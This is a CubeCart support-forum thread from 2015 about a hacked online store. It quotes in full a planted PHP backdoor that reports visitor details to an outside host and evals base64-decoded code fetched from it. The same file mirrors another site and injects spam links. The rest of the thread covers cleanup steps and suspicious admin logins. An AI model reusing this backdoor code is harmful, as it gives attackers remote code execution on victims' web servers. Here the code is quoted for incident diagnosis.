Malicious file found

[Guest]

I have been hit by an exploit which can only have come from cubecart.

Among various files it has uploaded to my server there is a folder called images/images and in there are numerous files like jiaju12.php jiaju13.php

If you search for this file name on google you can find many other cubecart sites that are also effected by this exploit. Has anyone come across this before??

The code in one of these files looks like this.

<?php
error_reporting(0);
ini_set("max_execution_time", "1800");
$site="http://www.gardenfurniture4u.co.uk/";
$dn =$_SERVER['SERVER_NAME']. $_SERVER['PHP_SELF'];
$sitearr = parse_url($site);
$site_host = $sitearr['host'];
$http = $_SERVER['HTTPS'] == "on" ? "https://" : "http://";
$dir = preg_replace("/\/[^\/]*?$/i","/",$_SERVER["QUERY_STRING"]);
$reqstr = $_SERVER["QUERY_STRING"];
$html = "1";

$reqstr = str_replace(".js",".js?",$reqstr);
header('Content-Type:text/html;charset=utf-8');
if(preg_match("/\.css\??/i",$reqstr)){$html="0";header('Content-type: text/css');}
if(stristr($reqstr,"css=css")){$html="0";header('Content-type: text/css');}
if(stristr($reqstr,"assets/css")){$html="0";header('Content-type: text/css');}
if(preg_match("/\.js\??/i",$reqstr)){$html="0";header('Content-type: text/javascript');}
if(preg_match("/\.(jpg|png|jpeg|jpe)\??/i",$reqstr)){$html="0";header('Content-type: image/jpeg');}
if(preg_match("/\.gif\??/i",$reqstr)){$html="0";header('Content-type: image/gif');}
if(preg_match("/\.ico\??/i",$reqstr)){$html="0";header('Content-type: image/x-icon');}
if(preg_match("/\.img\??/i",$reqstr)){$html="0";header('Content-type: application/x-img');}
if(preg_match("/\.(xml|wsdl|xsl)\??/i",$reqstr)){$html="0";header('Content-type: text/xml');}
if(preg_match("/\.bmp\??/i",$reqstr)){$html="0";header('Content-type: application/x-bmp');}
if(preg_match("/\.doc\??/i",$reqstr)){$html="0";header('Content-type: application/msword');}
if(preg_match("/\.wmv\??/i",$reqstr)){$html="0";header('Content-type: video/x-ms-wmv');}
if(preg_match("/\.xls\??/i",$reqstr)){$html="0";header('Content-type: application/x-xls');}
if(preg_match("/\.tif\??/i",$reqstr)){$html="0";header('Content-type: image/tiff');}
if(preg_match("/\.(asf|asx)\??/i",$reqstr)){$html="0";header('Content-type: video/x-ms-asf');}
if(preg_match("/\.exe\??/i",$reqstr)){$html="0";header('Content-type: application/x-msdownload');}
if($html=="1")
{
$ip = $_SERVER["REMOTE_ADDR"];
$useragent = urlencode($_SERVER["HTTP_USER_AGENT"]);
$referer = urlencode($_SERVER["HTTP_REFERER"]);
$http = isset($_SERVER['HTTPS']) ? "https://" : "http://";
$mirror_addr = $http.$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]."?".urlencode($_SERVER["QUERY_STRING"]);
$data = gethttp("http://beautifulrealhairwigs.com/api/api.php?cmd=jiajulinks","ip=$ip&useragent=$useragent&referer=$referer&mirror_addr=$mirror_addr");
@eval(@base64_decode(@get_key("evalcode")));
}
function get_key($str)
{
global $data;
    preg_match("/$str:(.+)/",$data,$array);    
    return count($array)>0 ? $array[1] : "";
}
function get_link()
{
    $link_arr = explode("\r\n",base64_decode(get_key("links")));
    return get_next_arr($link_arr);
}
function get_next_arr($arr)
{
global $arr_i;
    if($arr_i>=count($arr)-1)
    {
        $arr_i = 0;
        return $arr[$arr_i++];
    }
    $result = $arr[$arr_i++];
    return ($result == "") ? get_next_arr($arr) : $result;
}
function get_keyword()
{
    $keyword_arr = explode("\r\n",base64_decode(get_key("keywords")));
    return get_next_arr($keyword_arr);
}
function gethttp($url,$postdata){
$url = str_replace("://",":||",$url);
$url = str_replace("//","/",$url);
$url = str_replace(":||","://",$url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
if($postdata != "")curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
if(substr($url,0,5)=="https")curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
if(substr($url,0,5)=="https")curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
if($postdata != "")curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
curl_setopt($ch, CURLOPT_REFERER, "http://www.googlebot.com/bot.html");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_MAXREDIRS, 3);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

$postdata = "";
foreach($_POST as $key=>$val)
{
    $postdata .= urlencode($key)."=".urlencode($val)."&";
}
$content=gethttp($site.$_SERVER["QUERY_STRING"],$postdata );

$content = str_replace("(0<=b.indexOf(\"?\")?\"&\":\"?\"","(0<=b.indexOf(\"?\")?\"?\":\"?\"",$content);

if(stristr($reqstr,"jquery")==false && stristr($reqstr,"ckeditor")==false && stristr($reqstr,"prototype")==false && stristr($reqstr,"effects")==false && stristr($reqstr,"dragdrop")==false && stristr($reqstr,"capture.js")==false  && stristr($reqstr,"varien/")==false)
{

$content = str_replace("$site_host","$dn?",$content);
$content = str_replace("http://www.www.","http://ww.",$content);
$content = str_replace("google-analytics","google",$content);
$content = preg_replace("/\s(src|href|action|data-backtoshopping|window\.location|data-src)\s*=\s*(\\\\?)(['|\"]?)\.?\/([a-z0-9])/i"," $1=$2$3{$http}{$dn}?/$4",$content);

$content = preg_replace("/\s(src|href|action|data-backtoshopping|window\.location|data-src)\s*=\s*(['|\"]?)(?!.*(http|\/\/))/i"," $1=$2$3{$http}{$dn}?",$content);

$$content = preg_replace("/([^a-z])url\s*\(\s*(['|\"]?)(\..*?)['|\"]?\s*\)/i","$1url($2{$http}{$dn}?{$dir}$3$2)",$content);
$content = preg_replace("/([^a-z])url\s*\(\s*(['|\"]?)(\/.*?)['|\"]?\s*\)/i","$1url($2{$http}{$dn}?$3$2)",$content);
    if(stristr($reqstr,".css"))
    {
        $content = preg_replace("/([^a-z])url\s*\(\s*(['|\"]?)(?!.*(http))(.*?)['|\"]?\s*\)/i","$1url($2{$http}{$dn}?{$dir}$4$2)",$content);
    }
    else
    {
        $content = preg_replace("/([^a-z])url\s*\(\s*(['|\"]?)(?!.*(http))(.*?)['|\"]?\s*\)/i","$1url($2{$http}{$dn}?$4$2)",$content);
    }
$content = str_replace("img src=\"i","img src=\"{$http}{$dn}?i",$content);
$content = str_replace("51.la","",$content);
}
$content = str_replace("</html>","",$content);

echo $content;
if($html=="0")exit;
?>
<style type="text/css">
.footer-container { width: 100%; height: auto; position: relative; overflow: hidden; }
#footer { width: 70%; margin: 0px auto; }
#footer-container { margin: 0px; padding: 25px 10px 10px; width: 100%; height: auto; position: relative; overflow: hidden; }
#footer { background-color: rgb(178, 34, 34); margin-top: 1.4em; color: rgb(255, 255, 255); }
#footer a { color: rgb(255, 255, 255); text-decoration: none; font-size: 10pt; }
#footer ul { list-style: none outside none; margin: 0px; }
#footer .col, #footer .section { float: left; margin-right: 1.5em; }
#copyright { bottom: 0px; color: rgb(153, 153, 153); font-size: 0.8em; margin-top: 2em; position: absolute; right: 3%; }
</style>
<div id="footer">
<div class="wrapper">
<div id="footer-container">
    <div id="ezinearticles-nav" class="section">
        <div class="col">
        </div>
<?php
    for($i=0;$i<10;$i++)
    {
        echo "<ul class=\"col\"><li><a href=\"".get_link()."\">".get_keyword()."</a></li></ul>\r\n";
    }
?>
        <div class="border-bottom-cover"></div>
    </div>
    <p id="copyright">? 2015 SparkNET<br>All Rights Reserved Worldwide</p>
</div>
</div>
</div>
</html>

[bsmither]

Please read this conversation.

Apply the code edits.

Remove any files you do not recognize.

[Guest]

I already removed everything that looked dodgy but how did it get on my server? there is only cubecart installed

[bsmither]

We know how. I won't go into the details.

Apply the code edits mentioned in the security update notice. Delete the snippets from admin and your site's folders as described in the conversation you've just read.

[Al Brookbanks]

Hi @bruton

What version of CubeCart were you running when this happened?

If you want our staff to clean up your store, make sure it's patched to the latest version and that any bad files left behind are removed please send a tech support ticket.

Edited November 12, 2015 by Al Brookbanks

[Frank Auffret]

I just had similar with Cubecart 6.0.8
Since the previous attack I regularly check all Cubecart sites (all 6.0.8) and today I found a code snippet in the hooks I went through all the files and removed anything that was either not supposed to be there or redundant. Checking the staff logs I spotted this entry but no username.

Dec 14 2015, 22:41 PM 93.115.95.216 Y

edited to add this site was not previously attacked

I found this file in the root
 

adminer.php

Edited December 18, 2015 by Frank Auffret
update malicious file found in root

[bsmither]

Please look in admin, Manage Hooks, Code Snippets tab. If you do not recognize a snippet in this list, delete it.

Snippets are databased and the snippet file will be created if not found when looked for.

[Frank Auffret]

Hi bsmither
Thanks for your reply. I did remove the snippet from the table as well and I checked all of my CC sites today to make sure there's nothing malicious. Although three of them were affected earlier this month, this particular site hasn't been attacked before. I added the admin fix last September when the security alert was posted and I have now upgraded each site to 6.0.8.

Just left wondering how these snippets and files get uploaded?

[havenswift-hosting]

If the store has been patched to the latest version, the snippet file removed and also removed from the database then that should secure the site completely.  There have been no other reports of any security issues or problems across all other CubeCart websites.  If you are convinced that you completed all three parts of the cleanup and still got hacked then you need to speak to your hosting company or a CubeCart technical specialist who can investigate the various logs to determine the cause

Ian

[Al Brookbanks]

If the store has been patched to the latest version, the snippet file removed and also removed from the database then that should secure the site completely.  There have been no other reports of any security issues or problems across all other CubeCart websites.  If you are convinced that you completed all three parts of the cleanup and still got hacked then you need to speak to your hosting company or a CubeCart technical specialist who can investigate the various logs to determine the cause

Ian

I just wanted to confirm that I am in agreement with this advice.

[Frank Auffret]

The store (5.2.16)was patched on September 7th  and upgraded to 6.0.8 on December 9 shortly before the attack - spotted on December 18. I upgraded all other sites at same time so would have checked for malicious folders, files and snippets in includes/extra (can't remember if I checked the table though).

It's a dedicated webserver so I'll see if I can find out when the file adminer.php was uploaded and the code snippet added to the table. I can see from the Cubecart staff access logs there are two successful admin logins recorded with no admin username and dodgy IP numbers.

Dec 14 2015, 22:41 PM 93.115.95.216
Nov 28 2015, 04:12 AM 142.4.213.25
All other login IP's check out OK

It looks like access was made without a username on December 14. & November 28. Was it possible to do this using the original security issue?

Is there anything else I should check?